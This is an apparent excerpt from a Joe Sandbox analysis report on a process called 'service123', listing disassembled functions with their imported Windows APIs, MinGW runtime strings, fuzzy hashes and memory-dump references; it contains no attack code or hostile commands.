Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction ID: 3ebac82fd12f645996a4d2d6b49ca4a84577b3d637cac84b027f0187622cfd01
Opcode Fuzzy Hash: 730b82d2da7bc35f9127cbebe574e0472547f7dc119ace965d717b640774afe3
Instruction Fuzzy Hash: BD113A7490121C9BCF14DF66C9889DEB7B5BF96358F248964EC0967B01DB30AE49CBA0

Function 6C76DD80 Relevance: 19.6, APIs: 13, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 969a6e84ef485a6d0f87a3e346e8a8000e5877b16e4c634416c9ff8726bfa541
Instruction ID: b4bb9c73ca180b22c975d44e0713adc300268c0ea0921ccea2831c7cbcd3ae85
Opcode Fuzzy Hash: 969a6e84ef485a6d0f87a3e346e8a8000e5877b16e4c634416c9ff8726bfa541
Instruction Fuzzy Hash: 7E211A74A0521D9BCF10DF62C9889DEB7B5FF85348F2588A8DC0967B41DB30AE49CB90

Function 6C770310 Relevance: 18.2, APIs: 12, Instructions: 165COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C83370F), ref: 6C77034B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C83370F), ref: 6C770352
SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C83370F), ref: 6C770360

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: edeab6045946f8c00dece98e103d5fd88a45a1cc22ee326e749546bc5fa99599
Instruction ID: 820e2ab671a76ef4c69290d5199528e06ac5eacdb17a4f2f63c2aa0de979f0ca
Opcode Fuzzy Hash: edeab6045946f8c00dece98e103d5fd88a45a1cc22ee326e749546bc5fa99599
Instruction Fuzzy Hash: E251187470A3458FCF20DF69C68861AB7F1BB86318F15593DE95887B10E732E845CBA2

Function 001E1940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 001E196F
vfprintf.MSVCRT ref: 001E198F
abort.MSVCRT ref: 001E1994
VirtualQuery.KERNEL32 ref: 001E1A2B

Strings

Mingw-w64 runtime failure:, xrefs: 001E1968
Address %p has no image-section, xrefs: 001E1AEB
VirtualProtect failed with code 0x%x, xrefs: 001E1AA6
VirtualQuery failed for %d bytes at address %p, xrefs: 001E1AD7

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: f86e96f3057ab14cbf79141f125cd4412a6a954800d0ea3ee66426a19a42c175
Instruction ID: 5ad33f2d1fd50f27ff42388aaea444c62d9d508895b1c5f429b883cd39b907b5
Opcode Fuzzy Hash: f86e96f3057ab14cbf79141f125cd4412a6a954800d0ea3ee66426a19a42c175
Instruction Fuzzy Hash: 7F518CB1504B80DFC700EF6AE98566EFBE0FF84354F49892DE4889B211D734E885CB92

Function 6C76A690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C76A6BF
vfprintf.MSVCRT ref: 6C76A6DF
abort.MSVCRT ref: 6C76A6E4
VirtualQuery.KERNEL32 ref: 6C76A77B

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 6C76A827
VirtualProtect failed with code 0x%x, xrefs: 6C76A7F6
Address %p has no image-section, xrefs: 6C76A83B
Mingw-w64 runtime failure:, xrefs: 6C76A6B8

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 88558ba1d524898d2722a338bfa1d650411c678215f52aa072f4239657b0dd33
Instruction ID: 06a2b2b656a4732d9d5ae9f76161b332d88fd2777be96d9aedb62f90ab267b38
Opcode Fuzzy Hash: 88558ba1d524898d2722a338bfa1d650411c678215f52aa072f4239657b0dd33
Instruction Fuzzy Hash: 0D516E716053119FCB10DF29C68964AFBF0FF85328F55892CE8989BB50D734E849CB92

Function 6C76E0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2196fd4d2f84e8e3b240ed80c707e21ae23bc8fe99bc3bacd2310f31b4bc5036
Instruction ID: 75cf0d2b812cde3383e9a47716bc2526a646f81685a8e365056709e2816b7388
Opcode Fuzzy Hash: 2196fd4d2f84e8e3b240ed80c707e21ae23bc8fe99bc3bacd2310f31b4bc5036
Instruction Fuzzy Hash: E52126323452188BCB08CE59DC8159673A6FBC232873885BED8488BF15D637A806D7A0

Function 6C76E570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: a5c872bfb64de1de5c63a4aff35f88af45abc8f8915fe86a06640a56978ab21e
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: EE41D87050831A8BD710DF2ECA40756B7E1AF91318F544E2AECA487E55E734D94E8BF2

Function 6C76E59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: c95c1ae4ecd8d58ed949d902e26ea0ad70733718d71b5a0aa8a5f3edab8b6a49
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: 4621C97050530A8BD710DE3ACA5066AB7E1AF51318F644E29DCA487E56F330D94ACBF2

Function 6C76E714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: 3c3fab358c47910b6356b33e2f99be73e03b4ef5159f7be7d337c902ed2c6c27
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 09E0267008921D8BCA20CE2ECE54195B7E4AF46308B404C17CCC6C7D01E330D94BCAE3

Function 6C779249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C779260
GetProcAddress.KERNEL32 ref: 6C77927A
LoadLibraryW.KERNEL32 ref: 6C77929F
GetProcAddress.KERNEL32 ref: 6C7792B3

Strings

SystemFunction036, xrefs: 6C7792A8
advapi32.dll, xrefs: 6C779298
msvcrt.dll, xrefs: 6C779255
rand_s, xrefs: 6C77926F

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 29805a13318f5d48c96ec5c775fa18e1fe8f811ed4189d056622d1c94e9c41c9
Instruction ID: 0c32003247b8de1275b3c93357607c20ff5c4f5f43432bd73e25b9ed64b085e1
Opcode Fuzzy Hash: 29805a13318f5d48c96ec5c775fa18e1fe8f811ed4189d056622d1c94e9c41c9
Instruction Fuzzy Hash: 3FF044B1956204CBDF20BF78864610EBFB0BB86324F414D3DD4D997610E734A414DBA7

Function 6C7FF670 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C7DD7DE), ref: 6C7FF70D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C7DD7DE), ref: 6C7FF738
memmove.MSVCRT ref: 6C7FF787
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C7DD7DE), ref: 6C7FF7BD
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C7DD7DE), ref: 6C7FF808

Strings

basic_string::_M_replace, xrefs: 6C7FF966

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 921cf1ae76f9d26651b10eebe36d7d13ffd3a2d46217941466cfe4f9e4196ca9
Instruction ID: 63d6db70fa8a4e78c1f981c8354f729016c9ac634d698c5bfc37d96bc108d552
Opcode Fuzzy Hash: 921cf1ae76f9d26651b10eebe36d7d13ffd3a2d46217941466cfe4f9e4196ca9
Instruction Fuzzy Hash: 9F813574A0E3559FC711DF68C2C051AFBE1AFC6244F64882EE4E487725DB31D88ADB62

Function 6C76FEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C7700D2
WaitForSingleObject.KERNEL32 ref: 6C770117

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: babba78ad99ef97f1d67e3adc603c3e014571e8c7d4ab7911217b61c50f69d7f
Instruction ID: 7d22fa5bd4b56525717041cb2a09f0ed47c1bdf1a9c5963dd58d0772ec197a80
Opcode Fuzzy Hash: babba78ad99ef97f1d67e3adc603c3e014571e8c7d4ab7911217b61c50f69d7f
Instruction Fuzzy Hash: 6261397070A349CFDB30DF6AD65839AB7B4AB46318F108939EC5887E40D775D449CBA2

Function 6C76E760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: 9e413b95276c12257f0d7620a4c90b59bb488739b0455f4d59db627a3d389260
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: 3101E570A4921D8FC700CA2AC980A9AF7E5AB85314F155D29EC8587F15E230DCCAC7E2

Function 001E2BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 001E2CC1

Strings

o, xrefs: 001E30A8
0, xrefs: 001E313E

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: bf3bbc7c26074305fdada9244c42eeb4e71099d68dd1d145150c1235eeac2da0
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: 1AF1C371A04A59CFCB14CF69C49469DFBF6BF88360F298229E854AB351D334ED45CB90

Function 6C7732C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C773391

Strings

o, xrefs: 6C773778
0, xrefs: 6C77380E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: b9f1a901c242f329b8bad326b12cfad4d0da85889df80a240fb0e845b8704388
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: 7CF1A271A052098FCF25CF68C5847DDBBF2BF89364F198229D864ABB41D734E945CBA0

Function 001E14E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 001E14F0
LoadLibraryA.KERNEL32 ref: 001E1506
GetProcAddress.KERNEL32 ref: 001E1525
GetProcAddress.KERNEL32 ref: 001E1537

Strings

libgcc_s_dw2-1.dll, xrefs: 001E14E9, 001E14FF
__deregister_frame_info, xrefs: 001E152C
__register_frame_info, xrefs: 001E151A

Memory Dump Source

Source File: 00000004.00000002.3472271261.00000000001E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000004.00000002.3472247083.00000000001E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472294710.00000000001EA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472312596.00000000001EE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.3472341172.00000000001F1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1e0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
